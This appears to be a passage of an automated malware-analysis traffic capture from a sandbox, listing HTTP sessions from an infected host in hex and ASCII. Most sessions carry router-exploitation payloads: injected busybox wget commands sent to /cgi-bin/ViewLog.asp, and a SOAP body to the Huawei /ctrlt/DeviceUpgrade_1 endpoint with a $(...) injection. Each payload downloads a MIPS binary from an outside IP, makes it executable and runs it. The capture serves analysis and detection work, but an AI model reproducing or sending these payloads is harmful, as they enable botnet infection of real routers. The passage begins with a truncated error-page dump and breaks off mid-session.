6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              641192.168.2.134476494.122.23.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.659037113 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              642192.168.2.135780262.194.153.1958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.861829042 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              643192.168.2.136012495.78.234.2078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.889692068 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.117532015 CET396INHTTP/1.1 405 Not Allowed
                                              Server: nginx/1.15.1
                                              Date: Thu, 23 Nov 2023 04:17:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.15.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              644192.168.2.134183041.232.4.18937215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.977741957 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:00.291030884 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              645192.168.2.135940694.190.212.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.514384031 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.270195961 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.584368944 CET137INHTTP/1.1 404 Not Found
                                              Connection: close
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              646192.168.2.1334678156.247.27.4137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.564435005 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:02.214293957 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:04.166201115 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:08.038209915 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:15.974173069 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              647192.168.2.133484294.24.37.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.667743921 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
